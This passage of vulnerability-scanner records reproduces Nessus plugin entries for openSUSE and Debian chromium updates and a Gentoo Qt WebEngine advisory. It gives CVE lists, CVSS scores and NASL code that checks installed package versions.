free in bookmarks.\n\n - CVE-2021-21168: Insufficient policy enforcement in\n appcache.\n\n - CVE-2021-21169: Out of bounds memory access in V8.\n\n - CVE-2021-21170: Incorrect security UI in Loader.\n\n - CVE-2021-21171: Incorrect security UI in TabStrip and\n Navigation.\n\n - CVE-2021-21172: Insufficient policy enforcement in File\n System API.\n\n - CVE-2021-21173: Side-channel information leakage in\n Network Internals.\n\n - CVE-2021-21174: Inappropriate implementation in\n Referrer.\n\n - CVE-2021-21175: Inappropriate implementation in Site\n isolation.\n\n - CVE-2021-21176: Inappropriate implementation in full\n screen mode.\n\n - CVE-2021-21177: Insufficient policy enforcement in\n Autofill.\n\n - CVE-2021-21178: Inappropriate implementation in\n Compositing.\n\n - CVE-2021-21179: Use after free in Network Internals.\n\n - CVE-2021-21180: Use after free in tab search.\n\n - CVE-2020-27844: Heap buffer overflow in OpenJPEG.\n\n - CVE-2021-21181: Side-channel information leakage in\n autofill.\n\n - CVE-2021-21182: Insufficient policy enforcement in\n navigations.\n\n - CVE-2021-21183: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21184: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21185: Insufficient policy enforcement in\n extensions.\n\n - CVE-2021-21186: Insufficient policy enforcement in QR\n scanning.\n\n - CVE-2021-21187: Insufficient data validation in URL\n formatting.\n\n - CVE-2021-21188: Use after free in Blink.\n\n - CVE-2021-21189: Insufficient policy enforcement in\n payments.\n\n - CVE-2021-21190: Uninitialized Use in PDFium.\n\n - CVE-2021-21149: Stack overflow in Data Transfer.\n\n - CVE-2021-21150: Use after free in Downloads.\n\n - CVE-2021-21151: Use after free in Payments.\n\n - CVE-2021-21152: Heap buffer overflow in Media.\n\n - CVE-2021-21153: Stack overflow in GPU Process. \n\n - CVE-2021-21154: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21155: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21156: Heap buffer overflow in V8.\n\n - CVE-2021-21157: Use after free in Web Sockets. \n\n - Fixed Sandbox with glibc 2.33 (boo#1182233)\n\n - Fixed an issue where chromium hangs on opening\n (boo#1182775).", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-10T00:00:00", "title": "openSUSE Security Update : chromium (openSUSE-2021-392)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21151", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2020-27844", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21156", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21155", "CVE-2021-21167", "CVE-2021-21150", "CVE-2021-21172", "CVE-2021-21152", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21154", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21149", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169", "CVE-2021-21153", "CVE-2021-21157"], "modified": "2021-03-10T00:00:00", "cpe": ["cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium-debuginfo"], "id": "OPENSUSE-2021-392.NASL", "href": "https://www.tenable.com/plugins/nessus/147606", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-392.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(147606);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\"CVE-2020-27844\", \"CVE-2021-21149\", \"CVE-2021-21150\", \"CVE-2021-21151\", \"CVE-2021-21152\", \"CVE-2021-21153\", \"CVE-2021-21154\", \"CVE-2021-21155\", \"CVE-2021-21156\", \"CVE-2021-21157\", \"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21164\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-21190\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2021-392)\");\n script_summary(english:\"Check for the openSUSE-2021-392 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for chromium fixes the following issues :\n\nUpdate to 89.0.4389.72 (boo#1182358, boo#1182960) :\n\n - CVE-2021-21159: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21160: Heap buffer overflow in WebAudio.\n\n - CVE-2021-21161: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21162: Use after free in WebRTC.\n\n - CVE-2021-21163: Insufficient data validation in Reader\n Mode.\n\n - CVE-2021-21164: Insufficient data validation in Chrome\n for iOS.\n\n - CVE-2021-21165: Object lifecycle issue in audio.\n\n - CVE-2021-21166: Object lifecycle issue in audio.\n\n - CVE-2021-21167: Use after free in bookmarks.\n\n - CVE-2021-21168: Insufficient policy enforcement in\n appcache.\n\n - CVE-2021-21169: Out of bounds memory access in V8.\n\n - CVE-2021-21170: Incorrect security UI in Loader.\n\n - CVE-2021-21171: Incorrect security UI in TabStrip and\n Navigation.\n\n - CVE-2021-21172: Insufficient policy enforcement in File\n System API.\n\n - CVE-2021-21173: Side-channel information leakage in\n Network Internals.\n\n - CVE-2021-21174: Inappropriate implementation in\n Referrer.\n\n - CVE-2021-21175: Inappropriate implementation in Site\n isolation.\n\n - CVE-2021-21176: Inappropriate implementation in full\n screen mode.\n\n - CVE-2021-21177: Insufficient policy enforcement in\n Autofill.\n\n - CVE-2021-21178: Inappropriate implementation in\n Compositing.\n\n - CVE-2021-21179: Use after free in Network Internals.\n\n - CVE-2021-21180: Use after free in tab search.\n\n - CVE-2020-27844: Heap buffer overflow in OpenJPEG.\n\n - CVE-2021-21181: Side-channel information leakage in\n autofill.\n\n - CVE-2021-21182: Insufficient policy enforcement in\n navigations.\n\n - CVE-2021-21183: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21184: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21185: Insufficient policy enforcement in\n extensions.\n\n - CVE-2021-21186: Insufficient policy enforcement in QR\n scanning.\n\n - CVE-2021-21187: Insufficient data validation in URL\n formatting.\n\n - CVE-2021-21188: Use after free in Blink.\n\n - CVE-2021-21189: Insufficient policy enforcement in\n payments.\n\n - CVE-2021-21190: Uninitialized Use in PDFium.\n\n - CVE-2021-21149: Stack overflow in Data Transfer.\n\n - CVE-2021-21150: Use after free in Downloads.\n\n - CVE-2021-21151: Use after free in Payments.\n\n - CVE-2021-21152: Heap buffer overflow in Media.\n\n - CVE-2021-21153: Stack overflow in GPU Process. \n\n - CVE-2021-21154: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21155: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21156: Heap buffer overflow in V8.\n\n - CVE-2021-21157: Use after free in Web Sockets. \n\n - Fixed Sandbox with glibc 2.33 (boo#1182233)\n\n - Fixed an issue where chromium hangs on opening\n (boo#1182775).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182233\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182775\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-89.0.4389.72-lp152.2.77.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-debuginfo-89.0.4389.72-lp152.2.77.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-89.0.4389.72-lp152.2.77.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-debuginfo-89.0.4389.72-lp152.2.77.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-10-17T06:46:04", "description": "The remote host is affected by the vulnerability described in GLSA-202004-04\n(Qt WebEngine: Arbitrary code execution)\n\n A use-after-free vulnerability has been found in the audio component of\n Qt WebEngine.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file in an application linked against Qt WebEngine, possibly resulting in\n execution of arbitrary code with the privileges of the process or a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 3, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-04-02T00:00:00", "title": "GLSA-202004-04 : Qt WebEngine: Arbitrary code execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720"], "modified": "2020-04-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:qtwebengine"], "id": "GENTOO_GLSA-202004-04.NASL", "href": "https://www.tenable.com/plugins/nessus/135115", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202004-04.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(135115);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/16\");\n\n script_cve_id(\"CVE-2019-13720\");\n script_xref(name:\"GLSA\", value:\"202004-04\");\n\n script_name(english:\"GLSA-202004-04 : Qt WebEngine: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202004-04\n(Qt WebEngine: Arbitrary code execution)\n\n A use-after-free vulnerability has been found in the audio component of\n Qt WebEngine.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file in an application linked against Qt WebEngine, possibly resulting in\n execution of arbitrary code with the privileges of the process or a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202004-04\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Qt WebEngine users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-qt/qtwebengine-5.14.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-qt/qtwebengine\", unaffected:make_list(\"ge 5.14.1\"), vulnerable:make_list(\"lt 5.14.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Qt WebEngine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T07:11:36", "description": "Several vulnerabilites have been discovered in the chromium web\nbrowser.\n\n - CVE-2021-21159\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21160\n Marcin Noga discovered a buffer overflow issue in\n WebAudio.\n\n - CVE-2021-21161\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21162\n A use-after-free issue was discovered in the WebRTC\n implementation.\n\n - CVE-2021-21163\n Alison Huffman discovered a data validation issue.\n\n - CVE-2021-21165\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21166\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21167\n Leecraso and Guang Gong discovered a use-after-free\n issue in the bookmarks implementation.\n\n - CVE-2021-21168\n Luan Herrera discovered a policy enforcement error in\n the appcache.\n\n - CVE-2021-21169\n Bohan Liu and Moon Liang discovered an out-of-bounds\n access issue in the v8 JavaScript library.\n\n - CVE-2021-21170\n David Erceg discovered a user interface error.\n\n - CVE-2021-21171\n Irvan Kurniawan discovered a user interface error.\n\n - CVE-2021-21172\n Maciej Pulikowski discovered a policy enforcement error\n in the File System API.\n\n - CVE-2021-21173\n Tom Van Goethem discovered a network based information\n leak.\n\n - CVE-2021-21174\n Ashish Guatam Kambled discovered an implementation error\n in the Referrer policy.\n\n - CVE-2021-21175\n Jun Kokatsu discovered an implementation error in the\n Site Isolation feature.\n\n - CVE-2021-21176\n Luan Herrera discovered an implementation error in the\n full screen mode.\n\n - CVE-2021-21177\n Abdulrahman Alqabandi discovered a policy enforcement\n error in the Autofill feature.\n\n - CVE-2021-21178\n Japong discovered an error in the Compositor\n implementation.\n\n - CVE-2021-21179\n A use-after-free issue was discovered in the networking\n implementation.\n\n - CVE-2021-21180\n Abdulrahman Alqabandi discovered a use-after-free issue\n in the tab search feature.\n\n - CVE-2021-21181\n Xu Lin, Panagiotis Ilias, and Jason Polakis discovered a\n side-channel information leak in the Autofill feature.\n\n - CVE-2021-21182\n Luan Herrera discovered a policy enforcement error in\n the site navigation implementation.\n\n - CVE-2021-21183\n Takashi Yoneuchi discovered an implementation error in\n the Performance API.\n\n - CVE-2021-21184\n James Hartig discovered an implementation error in the\n Performance API.\n\n - CVE-2021-21185\n David Erceg discovered a policy enforcement error in\n Extensions.\n\n - CVE-2021-21186\n dhirajkumarnifty discovered a policy enforcement error\n in the QR scan implementation.\n\n - CVE-2021-21187\n Kirtikumar Anandrao Ramchandani discovered a data\n validation error in URL formatting.\n\n - CVE-2021-21188\n Woojin Oh discovered a use-after-free issue in\n Blink/Webkit.\n\n - CVE-2021-21189\n Khalil Zhani discovered a policy enforcement error in\n the Payments implementation.\n\n - CVE-2021-21190\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21191\n raven discovered a use-after-free issue in the WebRTC\n implementation.\n\n - CVE-2021-21192\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21193\n A use-after-free issue was discovered in Blink/Webkit.\n\n - CVE-2021-21194\n Leecraso and Guang Gong discovered a use-after-free\n issue in the screen capture feature.\n\n - CVE-2021-21195\n Liu and Liang discovered a use-after-free issue in the\n v8 JavaScript library.\n\n - CVE-2021-21196\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21197\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21198\n Mark Brand discovered an out-of-bounds read issue in the\n Inter-Process Communication implementation.\n\n - CVE-2021-21199\n Weipeng Jiang discovered a use-after-free issue in the\n Aura window and event manager.", "edition": 4, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-04-07T00:00:00", "title": "Debian DSA-4886-1 : chromium - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21192", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21196", "CVE-2021-21195", "CVE-2021-21171", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21199", "CVE-2021-21172", "CVE-2021-21191", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21193", "CVE-2021-21166", "CVE-2021-21194", "CVE-2021-21175", "CVE-2021-21198", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169", "CVE-2021-21197"], "modified": "2021-04-07T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "p-cpe:/a:debian:debian_linux:chromium"], "id": "DEBIAN_DSA-4886.NASL", "href": "https://www.tenable.com/plugins/nessus/148364", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4886. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(148364);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/15\");\n\n script_cve_id(\"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-21190\", \"CVE-2021-21191\", \"CVE-2021-21192\", \"CVE-2021-21193\", \"CVE-2021-21194\", \"CVE-2021-21195\", \"CVE-2021-21196\", \"CVE-2021-21197\", \"CVE-2021-21198\", \"CVE-2021-21199\");\n script_xref(name:\"DSA\", value:\"4886\");\n script_xref(name:\"IAVA\", value:\"2021-A-0152\");\n\n script_name(english:\"Debian DSA-4886-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilites have been discovered in the chromium web\nbrowser.\n\n - CVE-2021-21159\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21160\n Marcin Noga discovered a buffer overflow issue in\n WebAudio.\n\n - CVE-2021-21161\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21162\n A use-after-free issue was discovered in the WebRTC\n implementation.\n\n - CVE-2021-21163\n Alison Huffman discovered a data validation issue.\n\n - CVE-2021-21165\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21166\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21167\n Leecraso and Guang Gong discovered a use-after-free\n issue in the bookmarks implementation.\n\n - CVE-2021-21168\n Luan Herrera discovered a policy enforcement error in\n the appcache.\n\n - CVE-2021-21169\n Bohan Liu and Moon Liang discovered an out-of-bounds\n access issue in the v8 JavaScript library.\n\n - CVE-2021-21170\n David Erceg discovered a user interface error.\n\n - CVE-2021-21171\n Irvan Kurniawan discovered a user interface error.\n\n - CVE-2021-21172\n Maciej Pulikowski discovered a policy enforcement error\n in the File System API.\n\n - CVE-2021-21173\n Tom Van Goethem discovered a network based information\n leak.\n\n - CVE-2021-21174\n Ashish Guatam Kambled discovered an implementation error\n in the Referrer policy.\n\n - CVE-2021-21175\n Jun Kokatsu discovered an implementation error in the\n Site Isolation feature.\n\n - CVE-2021-21176\n Luan Herrera discovered an implementation error in the\n full screen mode.\n\n - CVE-2021-21177\n Abdulrahman Alqabandi discovered a policy enforcement\n error in the Autofill feature.\n\n - CVE-2021-21178\n Japong discovered an error in the Compositor\n implementation.\n\n - CVE-2021-21179\n A use-after-free issue was discovered in the networking\n implementation.\n\n - CVE-2021-21180\n Abdulrahman Alqabandi discovered a use-after-free issue\n in the tab search feature.\n\n - CVE-2021-21181\n Xu Lin, Panagiotis Ilias, and Jason Polakis discovered a\n side-channel information leak in the Autofill feature.\n\n - CVE-2021-21182\n Luan Herrera discovered a policy enforcement error in\n the site navigation implementation.\n\n - CVE-2021-21183\n Takashi Yoneuchi discovered an implementation error in\n the Performance API.\n\n - CVE-2021-21184\n James Hartig discovered an implementation error in the\n Performance API.\n\n - CVE-2021-21185\n David Erceg discovered a policy enforcement error in\n Extensions.\n\n - CVE-2021-21186\n dhirajkumarnifty discovered a policy enforcement error\n in the QR scan implementation.\n\n - CVE-2021-21187\n Kirtikumar Anandrao Ramchandani discovered a data\n validation error in URL formatting.\n\n - CVE-2021-21188\n Woojin Oh discovered a use-after-free issue in\n Blink/Webkit.\n\n - CVE-2021-21189\n Khalil Zhani discovered a policy enforcement error in\n the Payments implementation.\n\n - CVE-2021-21190\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21191\n raven discovered a use-after-free issue in the WebRTC\n implementation.\n\n - CVE-2021-21192\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21193\n A use-after-free issue was discovered in Blink/Webkit.\n\n - CVE-2021-21194\n Leecraso and Guang Gong discovered a use-after-free\n issue in the screen capture feature.\n\n - CVE-2021-21195\n Liu and Liang discovered a use-after-free issue in the\n v8 JavaScript library.\n\n - CVE-2021-21196\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21197\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21198\n Mark Brand discovered an out-of-bounds read issue in the\n Inter-Process Communication implementation.\n\n - CVE-2021-21199\n Weipeng Jiang discovered a use-after-free issue in the\n Aura window and event manager.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21166\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21167\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21171\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 